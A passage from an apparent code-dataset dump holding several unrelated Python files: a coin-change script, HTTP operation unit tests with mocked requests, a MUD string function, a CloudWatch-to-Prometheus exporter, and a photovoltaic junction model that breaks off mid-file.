992,145 | 29de1381e54377baefb11e5bf74dc8e6bd2b8f5b | '''
거스름돈 그리드 알고리즘
n원을 500,100,50,10원 중 최소 동전 개수 구하기
단 n원은 항상 10의 배수이다.
'''
N = int(input('N원을 입력하시오(단 N는10의 배수) : '))
money = [500,100,50,10]
cnt = 0
for money in money:
cnt += N//money
N%=money
print(cnt) |
992,146 | 64394ea4654d8477355f1337e0bb5906e4c7202f | from unittest import TestCase, mock
from unittest.mock import patch
from core.httpoperation import HttpOperation
from tests.core.replicatortest import ReplicatorTest
def mock_request_get(url, params=None, headers=None):
pass
def mock_request_post(url, data=None, json=None, headers=None):
pass
def mock_request_delete(url, headers=None):
pass
def mock_request_put(url, data=None, headers=None):
pass
class HttpOperationTest(TestCase):
SAMPLE_OP_INFOS = {
"tags": [
"pet"
],
"summary": "Updates a pet in the store with form data",
"description": "",
"operationId": "updatePetWithForm",
"consumes": [
"application/x-www-form-urlencoded"
],
"produces": [
"application/xml",
"application/json"
],
"parameters": [
{
"name": "petId",
"in": "path",
"description": "ID of pet that needs to be updated",
"required": True,
"type": "integer",
"format": "int64"
},
{
"name": "name",
"in": "formData",
"description": "Updated name of the pet",
"required": False,
"type": "string"
},
{
"name": "status",
"in": "formData",
"description": "Updated status of the pet",
"required": False,
"type": "string"
}
],
"responses": {
"405": {
"description": "Invalid input"
}
},
"security": [
{
"petstore_auth": [
"write:pets",
"read:pets"
]
}
]
}
def setUp(self):
self.http_op = HttpOperation('post', 'https://server.de/', 'pet/{petId}/uploadImage', self.SAMPLE_OP_INFOS,
{"X-API-Key": "abcdef123"}, False)
def test_replace_url_parameter_replaces_placeholder_in_url_with_type_value(self):
url = self.http_op.replace_url_parameter(ReplicatorTest.SAMPLE_DEFINITION, self.http_op.url, 'petId', 'integer')
self.assertEqual(url, 'https://server.de/pet/0/uploadImage')
def test_replace_url_parameter_replaces_only_named_param(self):
url = self.http_op.replace_url_parameter(ReplicatorTest.SAMPLE_DEFINITION,
'https://server.de/pet/{petId}/uploadImage/{imgName}',
'imgName', 'string')
self.assertEqual(url, 'https://server.de/pet/{petId}/uploadImage/')
def test_create_form_parameter_makes_instance_of_type_as_string(self):
value = self.http_op.create_form_parameter(ReplicatorTest.SAMPLE_DEFINITION, 'integer')
self.assertEqual(value, '0')
def test_execute_with_unrecognizable_http_op_will_result_in_Nonetype_response(self):
self.http_op = HttpOperation('OGRE', 'https://server.de/', 'pet/{petId}/uploadImage', self.SAMPLE_OP_INFOS,
{"X-API-Key": "abcdef123"}, False)
result = self.http_op.execute(ReplicatorTest.SAMPLE_DEFINITION)
self.assertIsNone(result)
@patch('requests.get', side_effect=mock_request_get)
def test_execute_with_parameter_definition_will_send_request_without_parameters_set(self, mock_get):
definition_no_parameters = self.SAMPLE_OP_INFOS
definition_no_parameters.pop('parameters', 0)
self.http_op = HttpOperation('get', 'https://server.de/', 'pet/{petId}/uploadImage', definition_no_parameters,
{"X-API-Key": "abcdef123"}, False)
self.http_op.execute(ReplicatorTest.SAMPLE_DEFINITION)
self.assertIn(mock.call(params={}, headers={"X-API-Key": "abcdef123"},
url='https://server.de/pet/{petId}/uploadImage'), mock_get.call_args_list)
@patch('requests.post', side_effect=mock_request_post)
def test_execute_will_post__op_request_with_params_when_form_data_param_set(self, mock_post):
self.http_op.execute(ReplicatorTest.SAMPLE_DEFINITION)
self.assertIn(mock.call(data={'status': '', 'name': ''}, json=None, headers={"X-API-Key": "abcdef123"},
url='https://server.de/pet/0/uploadImage'), mock_post.call_args_list)
@patch('requests.get', side_effect=mock_request_get)
def test_execute_will_get_op_request_with_url_and_params_when_form_data_param_set(self, mock_get):
self.http_op = HttpOperation('get', 'https://server.de/', 'pet/{petId}/uploadImage',
self.SAMPLE_OP_INFOS, {"X-API-Key": "abcdef123"}, False)
self.http_op.execute(ReplicatorTest.SAMPLE_DEFINITION)
self.assertIn(mock.call(params={'status': '', 'name': ''},
url='https://server.de/pet/0/uploadImage', headers={"X-API-Key": "abcdef123"}),
mock_get.call_args_list)
@patch('requests.delete', side_effect=mock_request_delete)
def test_execute_will_delete_op_request_with_url_only(self, mock_delete):
self.http_op = HttpOperation('delete', 'https://server.de/', 'pet/{petId}/uploadImage',
self.SAMPLE_OP_INFOS, {"X-API-Key": "abcdef123"}, False)
self.http_op.execute(ReplicatorTest.SAMPLE_DEFINITION)
self.assertIn(mock.call(url='https://server.de/pet/0/uploadImage', headers={"X-API-Key": "abcdef123"}),
mock_delete.call_args_list)
@patch('requests.put', side_effect=mock_request_put)
def test_execute_will_put_op_request_with_url_and_params_when_form_data_param_set(self, mock_put):
self.http_op = HttpOperation('put', 'https://server.de/', 'pet/{petId}/uploadImage',
self.SAMPLE_OP_INFOS, {"X-API-Key": "abcdef123"}, False)
self.http_op.execute(ReplicatorTest.SAMPLE_DEFINITION)
self.assertIn(mock.call(data={'status': '', 'name': ''}, headers={"X-API-Key": "abcdef123"},
url='https://server.de/pet/0/uploadImage'), mock_put.call_args_list)
|
992,147 | da26d6bb422c06c66c887601abfb5cc88ed7351f | # -*-coding:Utf-8 -*
# Copyright (c) 2010-2017 LE GOFF Vincent
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Fichier contenant la fonction remplacer."""
from primaires.scripting.fonction import Fonction
from primaires.scripting.instruction import ErreurExecution
class ClasseFonction(Fonction):
"""Remplace un morceau de chaîne par une autre."""
@classmethod
def init_types(cls):
cls.ajouter_types(cls.remplacer, "str", "str", "str")
@staticmethod
def remplacer(origine, recherche, remplacement):
"""Remplace une partie de la chaîne indiquée.
Paramètres à préciser :
* origine : la chaîne d'origine, celle qui sera modifiée
* recherche : la chaîne à rechercher
* remplacement : la chaîne qui doit remplacer la recherche
Exemple d'utilisation :
chaine = "C'est une phrase contenant le mot pigeon."
chaine = remplacer(chaine, "pigeon", "carad")
# 'chaine' contient à présent
# "C'est une phrase contenant le mot canard."
La partie à remplacer peut se trouver n'importe où dans la
chaîne, au début, milieu ou à la fin. Elle peut se trouver
plusieurs fois. La recherche est sensible aux majuscules
et accents.
"""
return origine.replace(recherche, remplacement)
|
992,148 | b487bf9ebc81fb0ccda4bb4d990ce890ce9ac724 | #!/usr/bin/python3
"""
===============
cwexport module
===============
Module for exporting cloudwatch metrics to a pure text Prometheus exposition format
To DocTest: python3 cwexporter.py -v
Example usage:
>>> region='us-east-1'
>>> namespace='AWS/EC2'
>>> type(listmetrics(Region_name=region, namespace=namespace))
<class 'list'>
>>> type(generate_metrics_querys(listmetrics(Region_name=region, namespace=namespace)))
<class 'tuple'>
>>> a, b = generate_metrics_querys(listmetrics(Region_name=region, namespace=namespace))
>>> type(a)
<class 'list'>
>>> type(b)
<class 'dict'>
>>> r=(generate_metrics_data(a,b, Region_name=region))
>>> type(r)
<class 'dict'>
>>> 'ApiCalls' in r.keys()
True
>>> type(r['ApiCalls'])
<class 'int'>
>>> r['ApiCalls']>=1
True
"""
import os
import sys
if 'LAMBDA_TASK_ROOT' in os.environ:
"Checking if we are running in a Lambda environment. This is needed in order to import the local boto3 version (1.9.129)."
envLambdaTaskRoot = os.environ["LAMBDA_TASK_ROOT"]
print("LAMBDA_TASK_ROOT env var:"+os.environ["LAMBDA_TASK_ROOT"])
print("sys.path:"+str(sys.path))
sys.path.insert(0,envLambdaTaskRoot)
import string
from boto3 import client #type: ignore
from datetime import datetime, timedelta
from collections import defaultdict
from itertools import zip_longest
from random import choice
from typing import List, Dict, Tuple, DefaultDict, Iterable, Any
def randomString(stringLength: int = 10) -> str:
"""Generate a random string of fixed length
>>> type(randomString(15))
<class 'str'>
>>> len(randomString(15))
15
"""
letters = string.ascii_lowercase
return ''.join(choice(letters) for i in range(stringLength))
def listmetrics(namespace: str = None, Region_name: str = None) -> List:
"""List metrics from a provided namespace or all metrics for a particular region, if namespace is None
>>> type(listmetrics(Region_name="us-east-1", namespace="AWS/EC2"))
<class 'list'>
"""
cloudwatch = client('cloudwatch', region_name=Region_name)
paginator = cloudwatch.get_paginator('list_metrics')
metrics=[] # type: List
if namespace is not None:
page = paginator.paginate(Namespace=namespace)
else:
page = paginator.paginate()
for response in page:
for metric in response['Metrics']:
metrics.append(metric)
return metrics
def generate_metrics_querys(metrics: List, period: int = 30, stats: str = 'Sum') -> Tuple[List, Dict]:
"""Generates a list and a dictionary of MetricDataQueries structures from a list of metrics. The dictionary is needed to later co-relate the Query with the Results based on the random generated Id
>>> a=(generate_metrics_querys(listmetrics(Region_name="us-east-1", namespace="AWS/EC2")))
>>> type(a)
<class 'tuple'>
>>> len(a)==2
True
"""
metricsquery = [] #type: List
resultsquery = defaultdict(list) #type: DefaultDict
for metric in metrics:
identity = randomString()
metricsquery.append({'Id': identity, 'MetricStat': {'Metric': metric, 'Period': period, 'Stat': stats} })
resultsquery[identity].append({'query': {'MetricStat': {'Metric': metric, 'Period': period, 'Stat': stats}}})
return metricsquery, dict(resultsquery)
def generate_metrics_data(metricsquery: List, resultsquery: Dict, deltaminutes: int = 5, Region_name: str = None) -> Dict:
"""Get the metrics data from the Cloudwatch GetMetricData API calls and append it to the resultsquery dictionary by their ID. Store the number of API Calls in the key ApiCalls for statistics
>>> a=generate_metrics_querys(listmetrics(Region_name="us-east-1", namespace="AWS/EC2"))
>>> d=generate_metrics_data(a[0],a[1],Region_name="us-east-1")
>>> type(d)
<class 'dict'>
>>> len(d)>=1
True
"""
cloudwatch=client('cloudwatch', region_name=Region_name)
paginator = cloudwatch.get_paginator('get_metric_data')
metricsgroup=grouper(metricsquery)
resultsquery['ApiCalls']=0
for mqs in metricsgroup:
for response in paginator.paginate(MetricDataQueries=mqs, StartTime=datetime.now()-timedelta(minutes=deltaminutes),EndTime=datetime.now()):
for results in response['MetricDataResults']:
resultsquery[results['Id']].append({'results':results})
resultsquery['ApiCalls']+=1
return resultsquery
def zip_discard_compr(*iterables: Iterable, sentinel: Any = object()) -> Any:
"""Will discard itens from a Grouper result as in to have the exact number of itens for each metricsquery list
>>> args=[iter('ABCDEFGHIJLMNOPQ')] * 5
>>> zip_discard_compr(*args)
[['A', 'B', 'C', 'D', 'E'], ['F', 'G', 'H', 'I', 'J'], ['L', 'M', 'N', 'O', 'P'], ['Q']]
"""
return [[entry for entry in iterable if entry is not sentinel]
for iterable in zip_longest(*iterables, fillvalue=sentinel)]
def grouper(iterable: Iterable, n: int = 100, fillvalue: Any = None) -> Any:
"""Collect data into fixed-length chunks or blocks. In this case, we want 100 metrics queries at a time, since this is the limit for a single GetMetricData Call
>>> grouper('ABCDEFG', 3)
[['A', 'B', 'C'], ['D', 'E', 'F'], ['G']]
"""
args = [iter(iterable)] * n
return zip_discard_compr(*args)
def formater(resultsquery: Dict) -> List:
"""
The formater function will return a Prometheus exposition formatted list of strings computed from a dictionary of responses from the GetMetricData api.
>>> test=dict()
>>> test['lvrqciqeoe']=[{'query': {'MetricStat': {'Metric': {'Namespace': 'AWS/EC2', 'MetricName': 'StatusCheckFailed_System', 'Dimensions': [{'Name': 'InstanceId', 'Value': 'i-0747590f4f554184a'}]}, 'Period': 30, 'Stat': 'Sum'}}}, {'results': {'Id': 'lvrqciqeoe', 'Label': 'StatusCheckFailed_System', 'Timestamps': [datetime(2019, 4, 5, 16, 25), datetime(2019, 4, 5, 16, 24), datetime(2019, 4, 5, 16, 23), datetime(2019, 4, 5, 16, 22)], 'Values': [0.0, 0.0, 0.0, 0.0], 'StatusCode': 'Complete'}}]
>>> formater(test)
['StatusCheckFailed_System{Namespace="AWS/EC2", InstanceId="i-0747590f4f554184a"} 0.0 1554481500.0', 'StatusCheckFailed_System{Namespace="AWS/EC2", InstanceId="i-0747590f4f554184a"} 0.0 1554481440.0', 'StatusCheckFailed_System{Namespace="AWS/EC2", InstanceId="i-0747590f4f554184a"} 0.0 1554481380.0', 'StatusCheckFailed_System{Namespace="AWS/EC2", InstanceId="i-0747590f4f554184a"} 0.0 1554481320.0']
>>> for i in formater(test): print(i)
...
StatusCheckFailed_System{Namespace="AWS/EC2", InstanceId="i-0747590f4f554184a"} 0.0 1554481500.0
StatusCheckFailed_System{Namespace="AWS/EC2", InstanceId="i-0747590f4f554184a"} 0.0 1554481440.0
StatusCheckFailed_System{Namespace="AWS/EC2", InstanceId="i-0747590f4f554184a"} 0.0 1554481380.0
StatusCheckFailed_System{Namespace="AWS/EC2", InstanceId="i-0747590f4f554184a"} 0.0 1554481320.0
"""
formattedresults=[] #type: List
for identiy, values in resultsquery.items():
body=''
if isinstance(values,list):
for v in values:
if 'query' in v:
metricname=v['query']['MetricStat']['Metric']['MetricName']
namespace=v['query']['MetricStat']['Metric']['Namespace']
headstring = f'{metricname}{{Namespace="{namespace}"'
dimensions=v['query']['MetricStat']['Metric']['Dimensions']
if isinstance(dimensions,list) and len(dimensions)>=1:
for k in dimensions:
body+=f', {k["Name"]}="{k["Value"]}"'
if 'results' in v:
datapoints=v['results']['Values']
timestamps=v['results']['Timestamps']
if isinstance(datapoints,list) and len(datapoints)>=1:
for index, (data, time) in enumerate(zip(datapoints, timestamps)):
endingstring=f'}} {data} {time.timestamp()}'
formattedresults.append(headstring+body+endingstring)
else:
endingstring = f'}} '
formattedresults.append(headstring+body+endingstring)
return formattedresults
if __name__ == "__main__":
import doctest
doctest.testmod()
|
992,149 | ddeb81c46b60d5f8aea5e274dbc3748a806e0b64 | # -*- coding: utf-8 -*-
"""
This is the PVcircuit Package.
pvcircuit.Junction() # properties and methods for each junction
"""
import math #simple math
import copy
import os
from time import time
from datetime import datetime
from functools import lru_cache
import numpy as np #arrays
import pandas as pd
import matplotlib.pyplot as plt #plotting
from parse import *
from scipy.optimize import brentq #root finder
#from scipy.special import lambertw, gammaincc, gamma #special functions
import scipy.constants as con #physical constants
import ipywidgets as widgets
from IPython.display import display
# constants
k_q = con.k/con.e
DB_PREFIX = 2. * np.pi * con.e * (con.k/con.h)**3 / (con.c)**2 /1.e4 #about 1.0133e-8 for Jdb[A/cm2]
nan=np.nan
# Junction defaults
Eg_DEFAULT=1.1 #[eV]
TC_REF=25.0 #[C]
AREA_DEFAULT = 1. #[cm2] note: if A=1, then I->J
BETA_DEFAUlT = 15. # unitless
# numerical calculation parameters
VLIM_REVERSE=10.
VLIM_FORWARD=3.
VTOL= 0.0001
EPSREL=1e-15
MAXITER=1000
GITpath = os.path.dirname(os.path.dirname(os.path.dirname(__file__)))
@lru_cache(maxsize = 100)
def TK(TC): return TC + con.zero_Celsius
#convert degrees celcius to kelvin
@lru_cache(maxsize = 100)
def Vth(TC): return k_q * TK(TC)
#Thermal voltage in volts = kT/q
@lru_cache(maxsize = 100)
def Jdb(TC, Eg):
#detailed balance saturation current
EgkT = Eg / Vth(TC)
#Jdb from Geisz et al.
return DB_PREFIX * TK(TC)**3. * (EgkT*EgkT + 2.*EgkT + 2.) * np.exp(-EgkT) #units from DB_PREFIX
def timestamp(fmt="%y%m%d-%H%M%S",tm=None):
# return a timestamp string with given format and epoch time
if tm == None:
tm=time()
date_time = datetime.fromtimestamp(tm)
return date_time.strftime(fmt)
def newoutpath(dname=None):
# return a new outputh within pvc_output
if os.path.exists(GITpath):
pvcoutpath = os.path.join(GITpath,'pvc_output')
if not os.path.exists(pvcoutpath):
os.mkdir(pvcoutpath)
if dname == None:
dname = timestamp()
else:
dname += timestamp()
newpath = os.path.join(pvcoutpath,dname)
if not os.path.exists(newpath):
os.mkdir(newpath)
return newpath
class Junction(object):
"""
Class for PV junctions.
:param Rs: series resistance [ohms]
"""
ATTR = ['Eg','TC','Gsh','Rser','lightarea','totalarea','Jext','JLC','beta','gamma','pn'
,'Jphoto','TK','Jdb']
ARY_ATTR = ['n','J0ratio','J0']
J0scale = 1000. # mA same as Igor, changes J0ratio because of units
def __init__(self, name='junc', Eg=Eg_DEFAULT, TC=TC_REF, \
Gsh=0., Rser=0., area=AREA_DEFAULT, \
n=[1.,2.], J0ratio=None, J0ref=None, \
RBB=None, Jext=0.04, JLC=0., J0default=10., \
pn=-1, beta=BETA_DEFAUlT, gamma=0. ):
self.ui = None
self.debugout = widgets.Output() # debug output
self.RBB_dict = {}
# user inputs
self.name = name # remember my name
self.Eg = np.float64(Eg) #: [eV] junction band gap
self.TC = np.float64(TC) #: [C] junction temperature
self.Jext = np.float64(Jext) #: [A/cm2] photocurrent density
self.Gsh = np.float64(Gsh) #: [mho] shunt conductance=1/Rsh
self.Rser = np.float64(Rser) #: [ohm] series resistance
self.lightarea = np.float64(area) # [cm2] illuminated junction area
self.totalarea = np.float64(area) # [cm2] total junction area including shaded areas
#used for tandems only
self.pn = int(pn) # p-on-n=1 or n-on-p=-1
self.beta = np.float64(beta) # LC parameter
self.gamma = np.float64(gamma) # PL parameter from Lan
self.JLC = np.float64(JLC) # LC current from other cell JLC=beta(this)*Jem(other)
# multiple diodes
# n=1 bulk, n=m SNS, and n=2/3 Auger mechanisms
ndiodes=len(n)
self.n = np.array(n) #diode ideality list e.g. [n0, n1]
if J0ref: #input list of absolute J0
if len(J0ref) == ndiodes: #check length
self._J0init(J0ref) # calculate self.J0ratio from J0ref at current self.TC
else:
print("J0ref mismatch", ndiodes, len(J0ref))
self.J0ratio = np.full_like(n,J0default) #default J0ratio
elif J0ratio: #input list of relative J0 ratios
if len(J0ratio) == ndiodes: #check length
self.J0ratio = np.array(J0ratio) #diode J0/Jdb^(1/n) ratio list for T dependence
else:
print("J0ratio mismatch", ndiodes, len(J0ratio))
self.J0ratio = np.full_like(n,J0default) #default J0ratio
else: #create J0ratio
self.J0ratio = np.full_like(n,J0default) #default J0ratio
self.set(RBB=RBB)
def copy(self):
'''
create a copy of a Junction
need deepcopy() to separate lists, dicts, etc but crashes
'''
tmp = copy.copy(self)
# manual since deepcopy does not work
tmp.n = self.n.copy()
tmp.J0ratio = self.J0ratio.copy()
tmp.RBB_dict = self.RBB_dict.copy()
return tmp
def __str__(self):
#attr_list = self.__dict__.keys()
#attr_dict = self.__dict__.items()
#print(attr_list)
strout = self.name+": <pvcircuit.junction.Junction class>"
strout += '\nEg = {0:.2f} eV, TC = {1:.1f} C' \
.format(self.Eg, self.TC)
strout += '\nJext = {0:.1f} , JLC = {1:.1f} mA/cm2' \
.format( self.Jext*1000., self.JLC*1000.)
strout += '\nGsh = {0:g} S/cm2, Rser = {1:g} Ωcm2' \
.format(self.Gsh, self.Rser)
strout += '\nlightA = {0:g} cm2, totalA = {1:g} cm2' \
.format(self.lightarea, self.totalarea)
strout += '\npn = {0:d}, beta = {1:g}, gamma = {2:g}' \
.format(self.pn, self.beta, self.gamma, self.JLC)
strout += '\n {0:^5s} {1:^10s} {2:^10s}' \
.format('n','J0ratio', 'J0(A/cm2)')
strout += '\n {0:^5s} {1:^10.0f} {2:^10.3e}' \
.format('db', 1., self.Jdb)
i=0
for ideality_factor,ratio, saturation_current in zip(self.n, self.J0ratio, self.J0):
strout += '\n {0:^5.2f} {1:^10.2f} {2:^10.3e}' \
.format(self.n[i], self.J0ratio[i], self.J0[i])
i+=1
if self.RBB_dict['method'] :
strout+=' \nRBB_dict: '+str(self.RBB_dict)
return strout
def __repr__(self):
return str(self)
'''
def __setattr__(self, key, value):
# causes problems
super(Junction, self).__setattr__(key, value)
self.set(key = value)
'''
def update(self):
# update Junction self.ui controls
if self.ui: # junction user interface has been created
if self.RBB_dict:
if self.RBB_dict['method']:
RBB_keys = list(self.RBB_dict.keys())
else:
RBB_keys = []
cntrls = self.ui.children
for cntrl in cntrls:
desc = cntrl._trait_values.get('description','nodesc') # control description
cval = cntrl._trait_values.get('value','noval') # control value
if desc == 'nodesc' or cval == 'noval':
break
elif desc.endswith(']') and desc.find('[') > 0 :
key, ind = parse('{}[{:d}]',desc)
else:
key = desc
ind = None
if key in self.ATTR: # Junction scalar controls to update
attrval = getattr(self, key) # current value of attribute
if cval != attrval:
with self.debugout: print('Jupdate: ' + desc, attrval)
cntrl.value = attrval
elif key in self.ARY_ATTR: # Junction array controls to update
attrval = getattr(self, key) # current value of attribute
if type(ind) is int:
if type(attrval) is np.ndarray:
if cval != attrval[ind]:
with self.debugout: print('Jupdate: ' + desc, attrval[ind])
cntrl.value = attrval[ind]
elif key in RBB_keys:
attrval = self.RBB_dict[key]
if cval != attrval:
with self.debugout: print('Jupdate: ' + desc, attrval)
cntrl.value = attrval
def set(self, **kwargs):
# controlled update of Junction attributes
with self.debugout: print('Jset('+self.name+'): ', list(kwargs.keys()))
for testkey, value in kwargs.items():
if testkey.endswith(']') and testkey.find('[') > 0 :
key, ind = parse('{}[{:d}]',testkey) #set one element of array e.g. 'n[0]'
else:
key = testkey
ind = None
if self.RBB_dict:
if self.RBB_dict['method']:
RBB_keys = list(self.RBB_dict.keys())
else:
RBB_keys = []
if key == 'RBB' or key == 'method':
# this change requires redrawing self.ui
if value == 'JFG': # RBB shortcut
self.__dict__['RBB_dict'] = {'method':'JFG', 'mrb':10., 'J0rb':0.5, 'Vrb':0.}
elif value == 'bishop':
self.__dict__['RBB_dict'] = {'method':'bishop','mrb':3.28, 'avalanche':1., 'Vrb':-5.5}
else:
self.__dict__['RBB_dict'] = {'method': None} #no RBB
if self.ui: # junction user interface has been created
#ui = self.controls() # redraw junction controls
pass
elif key in RBB_keys: #RBB parameters
self.RBB_dict[key] = np.float64(value)
elif key == 'area': # area shortcut
self.__dict__['lightarea'] = np.float64(value)
self.__dict__['totalarea'] = np.float64(value)
elif key == 'name': # strings
self.__dict__[key] = str(value)
elif key == 'pn': # integers
self.__dict__[key] = int(value)
elif key == 'RBB_dict':
self.__dict__[key] = value
elif key in ['n','J0ratio']: # diode parameters (array)
if type(ind) is int and np.isscalar(value) :
attrval = getattr(self, key) # current value of attribute
localarray = attrval.copy()
if type(localarray) is np.ndarray:
if ind < localarray.size:
localarray[ind] = np.float64(value) #add new value
self.__dict__[key] = localarray
with self.debugout: print('scalar',key, ind, localarray)
else:
self.__dict__[key] = np.array(value)
with self.debugout: print('array', key, value)
elif key in self.ATTR: # scalar float
self.__dict__[key] = np.float64(value)
with self.debugout: print('ATTR', key, value)
else:
with self.debugout: print('no Junckey',key)
@property
def Jphoto(self): return self.Jext * self.lightarea / self.totalarea + self.JLC
# total photocurrent
# external illumination is distributed over total area
@property
def TK(self):
#temperature in (K)
return TK(self.TC)
@property
def Vth(self):
#Thermal voltage in volts = kT/q
return Vth(self.TC)
@property
def Jdb(self):
#detailed balance saturation current
return Jdb(self.TC, self.Eg)
@property
def J0(self):
#dynamically calculated J0(T)
#return np.ndarray [J0(n0), J0(n1), etc]
if (type(self.n) is np.ndarray) and (type(self.J0ratio) is np.ndarray):
if self.n.size == self.J0ratio.size:
return (self.Jdb * self.J0scale)**(1./self.n) * self.J0ratio / self.J0scale
else:
return np.nan # different sizes
else:
return np.nan # not numpy.ndarray
def _J0init(self,J0ref):
'''
initialize self.J0ratio from J0ref
return np.ndarray [J0(n0), J0(n1), etc]
'''
J0ref = np.array(J0ref)
if (type(self.n) is np.ndarray) and (type(J0ref) is np.ndarray):
if self.n.size == J0ref.size:
self.J0ratio = self.J0scale * J0ref / (self.Jdb * self.J0scale)**(1./self.n)
return 0 # success
else:
return 1 # different sizes
else:
return 2 # not numpy.ndarray
def Jem(self,Vmid):
'''
light emitted from junction by reciprocity
quantified as current density
'''
if Vmid > 0.:
Jem = self.Jdb * (np.exp(Vmid / self.Vth) - 1.) # EL Rau
Jem += self.gamma * self.Jphoto # PL Lan and Green
return Jem
else:
return 0.
def notdiode(self):
'''
is this junction really a diode
or just a resistor
sum(J0) = 0 -> not diode
pn = 0 -> not diode
'''
if self.pn == 0:
return True
jsum = np.float64(0.)
for saturation_current in self.J0:
jsum +=saturation_current
return (jsum == np.float64(0.))
def Jmultidiodes(self,Vdiode):
'''
calculate recombination current density from
multiple diodes self.n, self.J0 numpy.ndarray
two-diodes:
n = [1, 2] #two diodes
J0 = [10,10] #poor cell
detailed balance:
n = [1]
J0 = [1]
three-diodes
n = [1, 1.8, (2/3)]
'''
Jrec = np.float64(0.)
for ideality_factor, saturation_current in zip(self.n, self.J0):
if ideality_factor>0. and math.isfinite(saturation_current):
try:
Jrec += saturation_current \
* (np.exp(Vdiode / self.Vth / ideality_factor) - 1.)
except:
continue
return Jrec
def JshuntRBB(self, Vdiode):
'''
return shunt + reverse-bias breakdown current
RBB_dict={'method':None} #None
RBB_dict={'method':'JFG', mrb'':10., 'J0rb':1., 'Vrb':0.}
RBB_dict={'method':'bishop','mrb'':3.28, 'avalanche':1, 'Vrb':-5.5}
RBB_dict={'method':'pvmismatch','ARBD':arbd,'BRBD':brbd,'VRBD':vrb,'NRBD':nrbd:
Vdiode without Rs
Vth = kT
Gshunt
'''
RBB_dict = self.RBB_dict
method=RBB_dict['method']
JRBB=np.float64(0.)
if method=='JFG' :
Vrb=RBB_dict['Vrb']
J0rb=RBB_dict['J0rb']
mrb=RBB_dict['mrb']
if Vdiode <= Vrb and mrb != 0. :
#JRBB = -J0rb * (self.Jdb)**(1./mrb) * (np.exp(-Vdiode / self.Vth / mrb) - 1.0)
JRBB = -J0rb * (self.Jdb*1000)**(1./mrb) / 1000. \
* (np.exp(-Vdiode / self.Vth / mrb) - 1.0)
elif method=='bishop':
Vrb=RBB_dict['Vrb']
a=RBB_dict['avalanche']
mrb=RBB_dict['mrb']
if Vdiode <= 0. and Vrb !=0. :
JRBB = Vdiode * self.Gsh * a * (1. - Vdiode / Vrb)**(-mrb)
elif method=='pvmismatch':
JRBB=np.float64(0.)
return Vdiode * self.Gsh + JRBB
def Jparallel(self,Vdiode,Jtot):
'''
circuit equation to be zeroed to solve for Vi
for voltage across parallel diodes with shunt and reverse breakdown
'''
if self.notdiode(): # sum(J0)=0 -> no diode
return Jtot
JLED = self.Jmultidiodes(Vdiode)
JRBB = self.JshuntRBB(Vdiode)
#JRBB = JshuntRBB(Vdiode, self.Vth, self.Gsh, self.RBB_dict)
return Jtot - JLED - JRBB
def Vdiode(self,Jdiode):
'''
Jtot = Jphoto + J
for junction self of class Junction
return Vdiode(Jtot)
no Rseries here
'''
if self.notdiode(): # sum(J0)=0 -> no diode
return 0.
Jtot = self.Jphoto + Jdiode
try:
Vdiode = brentq(self.Jparallel, -VLIM_REVERSE, VLIM_FORWARD, args=(Jtot),
xtol=VTOL, rtol=EPSREL, maxiter=MAXITER,
full_output=False, disp=True)
except:
return np.nan
#print("Exception:",err)
return Vdiode
def _dV(self, Vmid, Vtot):
'''
see singlejunction
circuit equation to be zeroed (returns voltage difference) to solve for Vmid
single junction circuit with series resistance and parallel diodes
'''
J = self.Jparallel(Vmid, self.Jphoto)
dV = Vtot - Vmid + J * self.Rser
return dV
def Vmid(self,Vtot):
'''
see Vparallel
find intermediate voltage in a single junction diode with series resistance
Given Vtot=Vparallel + Rser * Jparallel
'''
if self.notdiode(): # sum(J0)=0 -> no diode
return 0.
try:
Vmid = brentq(self._dV, -VLIM_REVERSE, VLIM_FORWARD, args=(Vtot),
xtol=VTOL, rtol=EPSREL, maxiter=MAXITER,
full_output=False, disp=True)
except:
return np.nan
#print("Exception:",err)
return Vmid
def controls(self):
'''
use interactive_output for GUI in IPython
'''
cell_layout = widgets.Layout(display='inline_flex',
flex_flow='row',
justify_content='flex-end',
width='300px')
# controls
in_name = widgets.Text(value=self.name,description='name',layout=cell_layout,
continuous_update=False)
in_Eg = widgets.FloatSlider(value=self.Eg, min=0.1,max=3.0,step=0.01,
description='Eg',layout=cell_layout,readout_format='.2f')
in_TC = widgets.FloatSlider(value=self.TC, min=-40, max=200.,step=2,
description='TC',layout=cell_layout,readout_format='.1f')
in_Jext = widgets.FloatSlider(value=self.Jext, min=0., max=.080,step=0.001,
description='Jext',layout=cell_layout,readout_format='.4f')
in_JLC = widgets.FloatSlider(value=self.JLC, min=0., max=.080,step=0.001,
description='JLC',layout=cell_layout,readout_format='.4f',disabled=True)
in_Gsh = widgets.FloatLogSlider(value=self.Gsh, base=10, min=-12, max=3 ,step=0.01,
description='Gsh',layout=cell_layout,readout_format='.2e')
in_Rser= widgets.FloatLogSlider(value=self.Rser, base=10, min=-7, max=3, step=0.01,
description='Rser',layout=cell_layout,readout_format='.2e')
in_lightarea = widgets.FloatLogSlider(value=self.lightarea, base=10, min=-6, max=3.,step=0.1,
description='lightarea',layout=cell_layout)
in_totalarea = widgets.FloatSlider(value=self.totalarea, min=self.lightarea, max=1e3, step=0.1,
